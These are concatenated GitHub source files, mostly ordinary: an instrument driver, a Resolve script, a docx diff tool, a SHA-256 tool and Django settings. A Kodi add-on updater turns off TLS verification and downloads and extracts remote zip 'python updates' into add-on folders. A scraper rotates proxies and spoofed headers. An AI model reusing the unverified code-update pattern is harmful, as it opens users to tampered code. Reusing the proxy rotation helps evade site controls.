Open the hardware connection.\n \"\"\"\n self.xmlrpc.open()\n\n\n def is_connected(self):\n \"\"\"\n Check if the connection is established with the hardware.\n Returns True if the hardware answers, False otherwise.\n \"\"\"\n answer = self.checkConnection()\n\n if answer == \"\":\n return False\n\n if 'KEITHLEY' not in answer:\n return False\n \n return True\n\n\n def checkConnection(self):\n \"\"\"\n Returns a NULL string or the instrument model name\n \"\"\"\n return self.xmlrpc.checkConnection()\n\n\n def register(self, bench):\n self.open()\n connected = self.is_connected()\n if not(connected):\n raise IOError(\"Keithley Multimeter not connected.\")\n\n Driver.register(self, bench)\n\n\n def close(self):\n \"\"\"\n Close the hardware connection.\n \"\"\"\n self.xmlrpc.close()\n # TODO: Check errors\n\n\n # ===================================================================\n # Instrument specific methods\n # ===================================================================\n\n\n def status(self):\n \"\"\"\n Return the status of the system.\n \"\"\"\n return self.xmlrpc.status()\n\n # --------------------------------------------------------------\n\n def reset(self):\n \"\"\"\n Reset the instrument to the factory default settings\n (with the exception of all remote interface settings).\n \"\"\"\n logging.info(\"Keithley.reset() called.\")\n result = self.xmlrpc.reset()\n logging.info(\"Keithley.reset() done.\")\n return result\n\n\n def clear(self):\n \"\"\"\n Clear the instrument status.\n \"\"\" \n logging.info(\"Keithley.clear() called.\")\n result = self.xmlrpc.clear()\n logging.info(\"Keithley.clear() done.\")\n return result\n\n \n # ----------------------- Keithley generic command ------------------\n\n def send(self, command, timeout = 1.0):\n \"\"\"\n Send a command through the serial port.\n Read the answer from the serial port.\n Return it as a string.\n\n If is specified, the function will wait\n for data with the specified timeout (instead of the default one). \n \"\"\"\n\n logging.info(\"Keithley.send() called.\")\n logging.info(\" command = [%s]\" % command)\n answer = self.xmlrpc.send(command, timeout)\n logging.info(\" answer = [%s]\" % answer)\n logging.info(\"Keithley.send() done.\")\n esr = self.xmlrpc.get_error_status()\n if esr != 0:\n logging.error(\"Keithley command [%s] failed: error code ESR = %d.\" \n % (command, esr))\n raise IOError(\"Keithley command [%s] failed: error code ESR = %d.\" \n % (command, esr))\n return answer\n\n # ----------------------- Keithley identification -------------------\n\n def get_serial(self):\n \"\"\"\n Return the identification string of the Keithley.\n \"\"\"\n logging.info(\"Keithley.get_serial() called.\")\n serial = self.xmlrpc.get_serial()\n logging.info(\" serial = [%s]\" % serial)\n logging.info(\"Keithley.get_serial() done.\")\n return serial\n\n # ----------------------- Various methods ---------------------------\n\n def scroll_text(self, msg):\n \"\"\"\n Scroll text 'msg' on the Multimeter display.\n For debug purpose only.\n \"\"\"\n logging.info(\"Keithley.scroll_text() called.\")\n result = self.xmlrpc.scroll_text(msg)\n logging.info(\"Keithley.scroll_text() done.\")\n return result\n\n\n # ----------------------- Higher level methods ----------------------\n\n def setup_current_measurements(self, current_range):\n \"\"\"\n Reset the Keithley and set it up for current measurements,\n using the specified current range (float).\n Useful when using photodiodes (DKD, NIST, etc).\n \"\"\"\n logging.info(\"Keithley.setup_current_measurements() called.\")\n self.send(\"*RST\")\n self.send(\"SYST:ZCH ON\")\n self.send(\"FUNC 'CURR:DC'\")\n self.send(\"CURR:RANG %.2g\" % current_range)\n self.send(\"SYST:ZCOR ON\")\n self.send(\"SYST:ZCH OFF\")\n logging.info(\"Keithley.setup_current_measurements() done.\")\n\n\n def read_measurement(self):\n \"\"\"\n Proceed to an individual measurement (READ?) and parse\n the resulting output (trying to take into account the\n various Keithley idiosyncracies).\n \"\"\"\n logging.info(\"Keithley.read_measurements() called.\")\n s = self.send(\"READ?\")\n elts = s.split(\",\")\n if len(elts) < 2: # has at minimum 2 fields, sometimes three...\n logging.error(\"READ?: no/incomplete data from the Keithley.\")\n raise IOError(\"READ?: no/incomplete data from the Keithley.\")\n\n measure = float(elts[0].replace('A', '')) # sometime the unit is there\n logging.info(\" measure = %g\" % measure)\n logging.info(\"Keithley.read_measurements() done.\")\n\n # keep memory of the last measure\n self.lastmeasure = measure\n \n return measure\n\n # ===================================================================\n # PRE/POST exposure hooks\n # ===================================================================\n\n def pre_exposure(self, exptime):\n pass\n\n def post_exposure(self):\n self.read_measurement()\n\n # ===================================================================\n # Meta data / state of the instrument \n # ===================================================================\n\n\n def get_meta(self):\n \"\"\"\n Returns meta data describing the current state\n of the instrument. \n Useful to fill the FITS headers.\n \"\"\"\n\n # keys : specify the key order\n keys = ['MODEL',\n 'DRIVER',\n 'CURRENT']\n\n # comments : meaning of the keys\n comments = {\n 'MODEL' : 'Instrument model',\n 'DRIVER' : 'Instrument software driver',\n 'CURRENT': '[A] Current measurement in photodiode' \n }\n\n values = {\n 'MODEL' : self.get_serial()[:36],\n 'DRIVER' : 'keithley-server / keithley_ks', \n 'CURRENT': self.lastmeasure\n }\n\n data = []\n \n return keys, values, comments, data\n\n # ===================================================================\n","repo_name":"lsst-camera-dh/pybench-ccd-reb","sub_path":"testbench/drivers/keithley_ks.py","file_name":"keithley_ks.py","file_ext":"py","file_size_in_byte":9058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5995270934","text":"#!/usr/bin/env python3\n\nimport ResolveLib.ianresolvelib as r\nimport argparse\n\n\"\"\" \nOpen the most recent version of a project.\n\nPass in the \"top level\" folder name, and it assumes that there are loads of \nfiles there named \"Project 01\" \"Project 02\" et cetera. Manual versioning.\n\nThis script lists them in alphabetical order and then opens the last \none in the list. So … hopefully it works for you? No guarantees.\n\"\"\"\n\nparser = argparse.ArgumentParser(description=\"Open the last (hopefully most recent) version of a file in a folder. In DaVinci Resolve, in case that wasn't clear.\")\nparser.add_argument(\"folder_name\", help=\"The name of the top level folder to look in.\")\nargs = parser.parse_args()\n\ntopLevelFolderName = args.folder_name\n\nr.bringToFront()\n\nr.projectManager.GotoRootFolder()\nr.projectManager.OpenFolder(topLevelFolderName)\n\n# gotta get the values from the dict, and convert to a list. Ugh\nprojects = list(r.projectManager.GetProjectsInCurrentFolder().values())\n\n# finally, sort it and grab the last one\nlast = sorted(projects)[-1]\n\nr.projectManager.LoadProject(last)\n","repo_name":"systemik/ians-davinci-resolve-scripts","sub_path":"openLastFileInFolder.py","file_name":"openLastFileInFolder.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"10369767881","text":"import requests\nimport random\nfrom collections import Counter\n\ndef get_raw_text(url='test'):\n proxies = ['http://159.203.3.234', 'http://164.132.170.100', 'http://146.59.2.185', 'http://137.74.65.101', ] \n proxy = {'http': random.choice(proxies)} \n headers_list = [{ \n 'authority': 'httpbin.org', \n 'cache-control': 'max-age=0', \n 'sec-ch-ua': '\"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"', \n 'sec-ch-ua-mobile': '?0', \n 'upgrade-insecure-requests': '1', \n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36', \n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', \n 'sec-fetch-site': 'none', \n 'sec-fetch-mode': 'navigate', \n 'sec-fetch-user': '?1', \n 'sec-fetch-dest': 'document', \n 'accept-language': 'en-US,en;q=0.9', \n }] \n headers = random.choice(headers_list) \n return requests.get(url, headers=headers, proxies=proxy).text\n\ndef get_wordcount(text=\"SHOULD BE 3\"):\n split_text = text.split()\n bl = [';', '-', '.', '_', '<', '>', '=', '%', '@', '{', '}', '[', ']', '(', ')', '\\\\', '/', '|', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0',]\n for c in bl:\n split_text = [ x for x in split_text if c not in x ]\n print(split_text)\n return len(split_text) * 0.95\n\ndef get_common_words(text='TESTING THIS SCRIPT'):\n split_text = text.lower().split()\n bl = ['<', '>', '=', '%', '@', '}', '{', '[', ']', '|', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', 'a', 'in', 'and', 'with', 'can', 'be', 'made', 'you', 'of', 'the', 'from', 'for']\n for c in bl:\n split_text = [ x for x in split_text if c not in x ]\n split_text = [x for x in split_text if len(x) >= 3]\n \n found = Counter(split_text)\n return found.most_common(5)\n\ndef get_percent_words(text=' '):\n wordcount = get_wordcount(text=text)\n common_words = get_common_words(text=text)\n words_percent = {}\n\n for word in range(len(common_words)):\n words_percent[common_words[word][0]] = (float(common_words[word][1]) / wordcount) * 100\n\n return words_percent\n","repo_name":"AmmarKhawaja/websiteAI","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6707297909","text":"\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n #Render Paths****************************\n path('', views.home),\n path('wall', views.wall),\n #Redirect Paths****************************\n path('register/new-user', views.register),\n path('login/user', views.login),\n path('message/posted', views.new_message),\n path('comment/posted', views.new_comment),\n path('message//delete', views.delete_message),\n path('wall/logout', views.logout),\n]","repo_name":"ChrisJHatfield/Python","sub_path":"Django/the_wall/wall_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14768442398","text":"from docx import Document\nfrom docx.document import Document as _Document\nfrom docx.oxml.text.paragraph import CT_P\nfrom docx.oxml.table import CT_Tbl\nfrom docx.table import _Cell, Table\nfrom docx.text.paragraph import Paragraph\nfrom docx.shared import RGBColor\n\nimport tools\nimport difflib\nimport docx_to_txt\nimport inspect\n\ndocx_path = tools.get_path('../../material/2-电子版对照.docx')\ndocx_txt_path = tools.get_path('../../output/2-电子版对照.txt')\nocr_path = tools.get_path('../../material/2-打印出纸质版.ocr.txt')\nresult_path = tools.get_path('../../output/2-对照.docx')\n\nocr_content = ''\nwith open(ocr_path, 'r') as file:\n ocr_content = file.read()\n\ndocx_to_txt.word_to_txt(docx_path, docx_txt_path)\n\ndocx_content = ''\nwith open(docx_txt_path, 'r') as file:\n docx_content = file.read()\n\ndiffer = difflib.Differ()\ndiff_content = differ.compare(docx_content, ocr_content)\ndiff = list(diff_content)\n\n\ndef add_run(paragraph, run, item):\n new_run = paragraph.add_run(item[-1])\n new_run.style = run.style\n font_members = inspect.getmembers(run.font)\n for member in font_members:\n member_name = member[0]\n if (not member_name.startswith('_')):\n value = getattr(run.font, member_name)\n try:\n setattr(new_run.font, member_name, value)\n except Exception:\n pass\n if (item[0] == '-'):\n new_run.font.color.rgb = RGBColor(255, 0, 0)\n elif (item[0] == '+'):\n new_run.font.color.rgb = RGBColor(0, 255, 0)\n elif (item[0] == '?'):\n new_run.font.color.rgb = RGBColor(0, 0, 255)\n\n\ndef iter_block_items(parent):\n if isinstance(parent, _Document):\n parent_elm = parent.element.body\n elif isinstance(parent, _Cell):\n parent_elm = parent._tc\n else:\n raise ValueError(\"something's not right\")\n\n for child in parent_elm.iterchildren():\n if isinstance(child, CT_P):\n yield Paragraph(child, parent)\n elif isinstance(child, CT_Tbl):\n yield Table(child, parent)\n\n\ndocument = Document(docx_path)\ndocument.save(result_path)\ndocument = Document(docx_path)\n\nindex = 0\nfor block in iter_block_items(document):\n is_paragraph = isinstance(block, Paragraph)\n if is_paragraph:\n paragraph = block\n old_runs = paragraph.runs\n if (len(old_runs) == 0):\n continue\n paragraph._p.clear()\n\n for run in old_runs:\n for char in run.text:\n if index >= len(diff):\n raise Exception('Out Of Index')\n visited = char == diff[index][-1] and '+' != diff[index][0]\n while not visited and index < len(diff) - 1:\n add_run(paragraph, run, diff[index])\n index += 1\n visited = (char == diff[index][-1]\n and diff[index][0] != '+')\n add_run(paragraph, run, diff[index])\n index += 1\n else:\n table = block\n for row in table.rows:\n for cell in row.cells:\n for paragraph in cell.paragraphs:\n old_runs = paragraph.runs\n if (len(old_runs) == 0):\n continue\n paragraph._p.clear()\n\n for run in old_runs:\n for char in run.text:\n if index >= len(diff):\n raise Exception('Out Of Index')\n visited = (char == diff[index][-1]\n and diff[index][0] != '+')\n while not visited and index < len(diff) - 1:\n add_run(paragraph, run, diff[index])\n index += 1\n visited = (char == diff[index][-1]\n and diff[index][0] != '+')\n add_run(paragraph, run, diff[index])\n index += 1\n\ndocument.save(result_path)\nprint('OK')","repo_name":"run-dream/ContractDiff","sub_path":"code/contract_diff.py","file_name":"contract_diff.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"4210353797","text":"#! /usr/bin/env python\n\nimport sys\nfrom sha256 import sha256\n\nif len(sys.argv) < 2:\n print(f\"Usage: {sys.argv[0]} [hex]\", file=sys.stderr)\n sys.exit(1)\n \ninput = sys.argv[1]\n\nis_hex = False\nif len(sys.argv) >= 3:\n\tis_hex = sys.argv[2].lower() == \"hex\"\n \nresult = sha256(input, is_hex)\nprint(result)","repo_name":"ottosch/simple-sha256","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3989536996","text":"import numpy as np\n\nsorted_list = [1, 2, 3, 4, 5, 6, 7, 8, 9]\nprev_img_time = 2.5\nimg_time = 5.5\nstart_index = next((i for i, v in enumerate(sorted_list) if v >= prev_img_time), 0)\nend_index = next((i for i, v in enumerate(sorted_list) if v >= img_time), len(sorted_list))\nodom_msgs_cur = sorted_list[start_index:end_index]\n\nprint(odom_msgs_cur)\n\n# # Find the index for the start value\n# start_index = next((i for i, v in enumerate(sorted_list) if v >= 4), None)\n#\n# # Find the index for the end value\n# end_index = next((i for i, v in enumerate(sorted_list) if v > 10), len)\n#\n# print(start_index) # This will output: 3\n# print(end_index) # This will output: 10\n#\n# # Slice the list between start and end indices\n# filtered_list = sorted_list[start_index:end_index]\n#\n# print(filtered_list) # This will output: [4, 5, 6, 7, 8, 9, 10]\n\n\nx = [1]\nprint(x[:-1])\n","repo_name":"Jostan86/pf_trunk_width","sub_path":"scripts/trials/odom_indexing.py","file_name":"odom_indexing.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74478809700","text":"# -*- coding: utf-8 -*-\r\n#\r\n# Copyright (C) 2015 Richard Dean\r\n#\r\n\r\nimport xbmcaddon\r\nimport xbmc\r\nimport requests\r\nimport requests.packages.urllib3\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nimport json\r\nimport os\r\n\r\nimport sfile\r\nimport utilsOTT as utils\r\n\r\n\r\nADDON = utils.ADDON\r\nHOME = utils.HOME\r\nPROFILE = utils.PROFILE\r\n\r\nAddonID = utils.AddonID\r\nAddon = utils.Addon \r\nepghome = utils.epghome\r\nepgpath = utils.epgpath\r\nextras = utils.extras \r\nlogos = utils.logos \r\n\r\nDSFID = utils.DSFID\r\nDSF = utils.DSF\r\nDSFVER = utils.DSFVER\r\nhome = utils.home\r\nprofile = utils.profile\r\n\r\nURL = utils.getBaseURL() + 'dsf-update.txt'\r\nFIRSTRUN = utils.getSetting('FIRSTRUN') == 'true'\r\n\r\nSkinID = 'skin.bello-dsf'\r\nSkin = xbmcaddon.Addon(SkinID) # forked bello version: 3.0.8\r\nskinhome = Skin.getAddonInfo('path')\r\n\r\n\r\ndef checkUpdate():\r\n if not FIRSTRUN:\r\n BASEURL = utils.getBaseURL()\r\n utils.DialogOK('Bienvenido a GVAX', 'Ahora vamos a hacer una copia de seguridad de alguno de', 'los archivos existentes antes de la instalación.') \r\n doBackup()\r\n \r\n Addon.setSetting('dixie.skin', 'EPG-Skin')\r\n utils.setSetting('SKIN', 'OTT-Skin')\r\n\r\n downloadDefaults(BASEURL)\r\n return\r\n\r\n response = getResponse()\r\n ottskin = response['DSFOTTSkin']\r\n epgskin = response['DSFEPGSkin']\r\n logocolour = response['DSFLogos']\r\n ottupdate = response['DSFOTTUpdate']\r\n epgupdate = response['DSFEPGUpdate']\r\n dsfupdate = response['DSFUpdate']\r\n kodiskin = response['DSFKodiSkin']\r\n\r\n\r\n curr = ottskin\r\n prev = utils.getSetting('DSFOTTSKIN')\r\n\r\n if not prev == curr:\r\n url = BASEURL + response['DSF OTT Skin']\r\n path = xbmc.translatePath(PROFILE) \r\n path = os.path.join(path, 'skins')\r\n zipfile = os.path.join(path, 'dsf-skin-update.zip')\r\n \r\n if not sfile.exists(path):\r\n sfile.makedirs(path)\r\n \r\n downloadSkins(url, path, zipfile)\r\n utils.setSetting('DSFOTTSKIN', curr)\r\n\r\n\r\n curr = epgskin\r\n prev = utils.getSetting('DSFEPGSKIN')\r\n\r\n if not prev == curr:\r\n url = BASEURL + response['DSF EPG Skin']\r\n path = os.path.join(extras, 'skins')\r\n zipfile = os.path.join(path, 'dsf-skin-update.zip')\r\n \r\n if not sfile.exists(path):\r\n sfile.makedirs(path)\r\n \r\n downloadSkins(url, path, zipfile)\r\n utils.setSetting('DSFEPGSKIN', curr)\r\n\r\n\r\n curr = logocolour\r\n prev = utils.getSetting('DSFLOGOS')\r\n\r\n if not prev == curr:\r\n url = BASEURL + response['DSF Logos']\r\n path = os.path.join(logos, 'Colour Logo Pack')\r\n zipfile = os.path.join(path, 'dsf-logos-update.zip')\r\n \r\n if not sfile.exists(path):\r\n sfile.makedirs(path)\r\n \r\n downloadLogos(url, path, zipfile)\r\n utils.setSetting('DSFLOGOS', curr)\r\n\r\n\r\n curr = ottupdate\r\n prev = utils.getSetting('DSFOTTUPDATE')\r\n\r\n if not prev == curr:\r\n url = BASEURL + response['DSF OTT Update']\r\n path = xbmc.translatePath(HOME)\r\n zipfile = os.path.join(path, 'dsf-ott-python.zip')\r\n \r\n doOTTUpdate(url, path, zipfile, ottupdate)\r\n utils.setSetting('DSFOTTUPDATE', curr)\r\n\r\n\r\n curr = epgupdate\r\n prev = utils.getSetting('DSFEPGUPDATE')\r\n\r\n if not prev == curr:\r\n url = BASEURL + response['DSF EPG Update']\r\n path = xbmc.translatePath(epghome)\r\n zipfile = os.path.join(path, 'dsf-epg-python.zip')\r\n \r\n if not sfile.exists(path):\r\n sfile.makedirs(path)\r\n \r\n doEPGUpdate(url, path, zipfile, epgupdate)\r\n utils.setSetting('DSFEPGUPDATE', curr)\r\n \r\n \r\n curr = dsfupdate\r\n prev = utils.getSetting('DSFUPDATE')\r\n\r\n if not prev == curr:\r\n url = BASEURL + response['DSF Update']\r\n path = xbmc.translatePath(home)\r\n zipfile = os.path.join(path, 'dsf-update.zip')\r\n \r\n if not sfile.exists(path):\r\n sfile.makedirs(path)\r\n \r\n doDSFUpdate(url, path, zipfile, dsfupdate)\r\n utils.setSetting('DSFUPDATE', curr)\r\n \r\n\r\n curr = kodiskin\r\n prev = utils.getSetting('DSFKODISKIN')\r\n\r\n if not prev == curr:\r\n url = BASEURL + response['DSF Kodi Skin']\r\n path = xbmc.translatePath(skinhome)\r\n zipfile = os.path.join(path, 'dsf-kodi-skin.zip')\r\n \r\n if not sfile.exists(path):\r\n sfile.makedirs(path)\r\n \r\n doDSFUpdate(url, path, zipfile, kodiskin)\r\n utils.setSetting('DSFKODISKIN', curr)\r\n\r\n return\r\n\r\n\r\ndef getResponse():\r\n request = requests.get(URL, verify=False)\r\n response = request.content\r\n\r\n utils.Log('Response in checkUpdate %s' % str(response))\r\n\r\n return json.loads(u\"\" + (response))\r\n\r\n\r\ndef doBackup():\r\n import datetime\r\n \r\n src = os.path.join(epgpath, 'channels')\r\n dst = os.path.join(epgpath, 'channels-backup')\r\n \r\n try:\r\n sfile.remove(dst)\r\n sfile.copy(src, dst)\r\n except:\r\n pass\r\n \r\n if os.path.exists(logos):\r\n now = datetime.datetime.now()\r\n date = now.strftime('%B-%d-%Y %H-%M')\r\n \r\n cur = Addon.getSetting('dixie.logo.folder')\r\n src = os.path.join(logos, cur)\r\n dst = os.path.join(logos, cur+'-%s' % date)\r\n \r\n try:\r\n sfile.rename(src, dst)\r\n except:\r\n pass\r\n\r\n\r\ndef downloadDefaults(url):\r\n import download\r\n import extract\r\n\r\n url1 = url + 'ott/skins.zip'\r\n url2 = url + 'ottepg/skins.zip'\r\n url3 = url + 'ottepg/logos.zip'\r\n # url4 = url + 'ottepg/channels.zip'\r\n \r\n path1 = xbmc.translatePath(PROFILE) # /addon_data/script.on-tapp.tv/\r\n path2 = os.path.join(epgpath, 'extras') # /addon_data/script.tvguidedixie/extras/\r\n path3 = os.path.join(path2, 'skins')\r\n path4 = os.path.join(path2, 'logos')\r\n \r\n zip1 = os.path.join(path1, 'skins.zip')\r\n zip2 = os.path.join(path2, 'skins.zip')\r\n zip3 = os.path.join(path2, 'logos.zip')\r\n # zip4 = os.path.join(epgpath, 'channels.zip')\r\n\r\n if not sfile.exists(epgpath):\r\n sfile.makedirs(epgpath)\r\n \r\n if not sfile.exists(path1):\r\n sfile.makedirs(path1)\r\n download.download(url1, zip1)\r\n extract.all(zip1, path1, dp='Installing OTT skins')\r\n sfile.remove(zip1)\r\n \r\n if not sfile.exists(path2):\r\n sfile.makedirs(path2)\r\n download.download(url2, zip2)\r\n extract.all(zip2, path2, dp='Installing EPG skins')\r\n sfile.remove(zip2)\r\n \r\n if not sfile.exists(path4):\r\n sfile.makedirs(path2)\r\n download.download(url3, zip3)\r\n extract.all(zip3, path2)\r\n sfile.remove(zip3)\r\n \r\n # if not sfile.exists(epgpath):\r\n # sfile.makedirs(epgpath)\r\n # download.download(url4, zip4)\r\n # extract.all(zip4, epgpath)\r\n # sfile.remove(zip4)\r\n\r\n Addon.setSetting('dixie.skin', 'EPG-Skin')\r\n Addon.setSetting('playlist.url', '')\r\n utils.setSetting('SKIN', 'OTT-Skin')\r\n \r\n if utils.DialogYesNo('Would you like to assign a button ', 'on your remote control or keybord', 'to activate the On-Tapp.TV Mini-Guide?'):\r\n xbmc.executebuiltin('RunScript(special://home/addons/script.tvguidedixie/keyProgrammer.py)')\r\n \r\n utils.setSetting('FIRSTRUN', 'true')\r\n\r\n\r\ndef downloadSkins(url, path, zipfile):\r\n import download\r\n import extract\r\n \r\n utils.DialogOK('Una nueva version actualizada está disponible.', 'Se puede descargar e instalar \",\" en su sistema GVAX.')\r\n \r\n download.download(url, zipfile)\r\n extract.all(zipfile, path, dp='Installing skin update')\r\n sfile.remove(zipfile)\r\n \r\n \r\ndef downloadLogos(url, path, zipfile):\r\n import download\r\n import extract\r\n \r\n utils.DialogOK('Algunos de los nuevos logotipos están disponibles.', 'Pueden ser descargados y añadidos a su logopack.')\r\n \r\n download.download(url, zipfile)\r\n extract.all(zipfile, path, dp='Installing logo update')\r\n sfile.remove(zipfile)\r\n \r\n\r\ndef doOTTUpdate(url, path, zipfile, ottupdate):\r\n import download\r\n import extract\r\n \r\n utils.DialogOK('A GVAX \"Live Update\" está disponible.', 'Actualización %s será descargado e instalado en su sistema.'% (ottupdate), 'Gracias.')\r\n download.download(url, zipfile)\r\n extract.all(zipfile, path, dp='Installing python update')\r\n sfile.remove(zipfile)\r\n utils.Log('OTT Update %s installed' % str(ottupdate))\r\n xbmc.executebuiltin('UpdateLocalAddons')\r\n\r\n\r\ndef doEPGUpdate(url, path, zipfile, epgupdate):\r\n import download\r\n import extract\r\n\r\n utils.DialogOK('Un GVAX EPG es \"Live Update\" disponible.', 'Actualización EPG %s será descargado e instalado en su sistema.' % (epgupdate), 'Gracias.')\r\n \r\n download.download(url, zipfile)\r\n extract.all(zipfile, path, dp='Installing python update')\r\n sfile.remove(zipfile)\r\n utils.Log('EPG Update %s installed' % str(epgupdate))\r\n xbmc.executebuiltin('UpdateLocalAddons')\r\n\r\n\r\ndef doDSFUpdate(url, path, zipfile, dsfupdate):\r\n import download\r\n import extract\r\n\r\n utils.DialogOK('Un GVAX es \"Live Update\" disponible.', 'Actualización %s será descargado e instalado en su sistema.' % (dsfupdate), 'Gracias.')\r\n \r\n download.download(url, zipfile)\r\n extract.all(zipfile, path, dp='Installing python update')\r\n sfile.remove(zipfile)\r\n utils.Log('EPG Update %s installed' % str(dsfupdate))\r\n xbmc.executebuiltin('UpdateLocalAddons')\r\n\r\n\r\ndef doDSFSkinUpdate(url, path, zipfile, kodiskin):\r\n import download\r\n import extract\r\n\r\n utils.DialogOK('Un GVAX es \"Live Update\" disponible.', 'Actualización %s será descargado e instalado en su sistema.' % (kodiskin), 'Gracias.')\r\n \r\n download.download(url, zipfile)\r\n extract.all(zipfile, path, dp='Installing skin update')\r\n sfile.remove(zipfile)\r\n utils.Log('Skin Update %s installed' % str(kodiskin))\r\n xbmc.executebuiltin('UpdateLocalAddons')\r\n","repo_name":"billymcintosh/script.ontappgpl","sub_path":"dsf.py","file_name":"dsf.py","file_ext":"py","file_size_in_byte":10078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35930726199","text":"import heapq\n\nH, W = map(int, input().split())\nA = [list(map(int, input().split())) for _ in range(H)]\n\ndef grid_dijkstra(sy, sx):\n dist = [[10**100]*W for _ in range(H)]\n que = [(0, sy, sx)]\n heapq.heapify(que)\n dist[sy][sx] = 0\n\n while que:\n d, y, x = heapq.heappop(que)\n if d > dist[y][x]: continue\n for ny, nx in [(y-1, x), (y+1, x), (y, x-1), (y, x+1)]:\n if 0 <= ny < H and 0 <= nx < W and d + A[ny][nx] < dist[ny][nx]:\n dist[ny][nx] = d + A[ny][nx]\n heapq.heappush(que, (dist[ny][nx], ny, nx))\n\n return dist\n\ndist1 = grid_dijkstra(H-1, 0)\ndist2 = grid_dijkstra(H-1, W-1)\ndist3 = grid_dijkstra(0, W-1)\n\nans = 10**100\nfor cy in range(H):\n for cx in range(W):\n ans = min(ans, dist1[cy][cx] + dist2[cy][cx] + dist3[cy][cx] - 2*A[cy][cx])\n\nprint(ans)\n","repo_name":"wonda-tea-coffee/competitive_programming.py","sub_path":"atcoder/past201912_j.py","file_name":"past201912_j.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74655762340","text":"import re\nimport graphviz\n\ndef CreateGraph(dict):\n s = graphviz.Digraph(\"structs\", node_attr={\"shape\": \"record\"})\n field_diagram = \"\"\n function_diagram = \"\"\n main_string = \"\"\n for key, value in dict.items():\n # print(key, value)\n field_diagram = \"\"\n if value[\"fields\"] != []:\n for val in value[\"fields\"]:\n for key1, value1 in val.items():\n if key1 == \"name\": field_diagram += value1 + \" : \"\n elif key1 == \"access\":\n value_joined=\"[]\"\n if len(value1) >= 1: value_joined = ' '.join(str(e) for e in value1)\n field_diagram += value_joined + \" | \"\n \n function_diagram = \"\"\n if value[\"functions\"] != []:\n for fun in value[\"functions\"]:\n for key2, value2 in fun.items():\n if key2 == \"name\":\n if value2 == \"\": function_diagram += \"init\"\n if value2 ==\"\": function_diagram += \"clinit\"\n else: function_diagram += value2\n elif key2 == \"arguments\":\n value_joined=\"()\"\n if len(value2) >=1: value_joined = \"(\" + ' '.join(str(e) for e in value2) + \")\"\n function_diagram += value_joined + \": \" \n elif key2 == \"returns\":\n if type(None) == type(value2): function_diagram += \"null\" + \" | \"\n else: function_diagram += value2 + \" | \"\n\n \n if field_diagram: main_string = field_diagram\n if function_diagram: main_string += function_diagram\n # print(main_string[:-2], '\\n')\n\n\n if field_diagram: s.node(key, r\"{ \" + key + \" | \" + main_string[:-2] + \"}\",)\n\n \n for val in value[\"relations\"][\"Composition\"]:\n s.edge(key, val, arrowhead=\"diamond\")\n for val in value[\"relations\"][\"Realization\"]:\n s.edge(key, val, arrowhead=\"normalo\", style=\"dashed\")\n for val in value[\"relations\"][\"Inheritance\"]:\n s.edge(key, val, arrowhead=\"normalo\")\n for val in value[\"relations\"][\"Aggregation\"]:\n s.edge(key, val, arrowhead=\"diamondo\")\n for val in value[\"relations\"][\"Dependency\"]:\n s.edge(key, val, arrowhead=\"vee\", style=\"dashed\")\n\n\n s.node(\"a\", \"\", color=\"white\")\n s.node(\"b\", \"\", color=\"white\")\n s.node(\"c\", \"\", color=\"white\")\n s.node(\"d\", \"\", color=\"white\")\n s.node(\"e\", \"\", color=\"white\")\n s.node(\"f\", \"\", color=\"white\")\n\n s.edge(\"a\", \"b\", arrowhead=\"diamond\", label=\"composition\")\n s.edge(\"b\", \"c\", arrowhead=\"normalo\", style=\"dashed\", label=\"realization\")\n s.edge(\"c\", \"d\", arrowhead=\"normalo\", label=\"inheritance\")\n s.edge(\"d\", \"e\", arrowhead=\"diamondo\", label=\"aggregation\")\n s.edge(\"e\", \"f\", arrowhead=\"vee\", style=\"dashed\", label=\"dependency\")\n\n s.render(\"./class-graph/class-diagram-3.gv\").replace(\"\\\\\", \"/\")\n\n","repo_name":"immarianaas/pa-23","sub_path":"assignment-3/CreateGraph.py","file_name":"CreateGraph.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7468349984","text":"from ._base import * # noqa\n\n\nACCOUNT_EMAIL_VERIFICATION = 'mandatory'\n\nALLOWED_HOSTS = [\n 'localhost',\n '127.0.0.1',\n '[::1]',\n '.pyslackers.com',\n]\n\nCSRF_COOKIE_SECURE = True\n\nDEBUG = False\n\nLOGGING = {\n 'version': 1,\n 'formatters': {\n 'standard': {\n 'format': \"[PYSLACKERSWEB] [%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s\", # noqa\n 'datefmt': \"%d/%b/%Y %H:%M:%S\"\n },\n 'verbose': {\n 'format': '%(process)-5d %(thread)d %(name)-50s %(levelname)-8s %(message)s', # noqa\n },\n 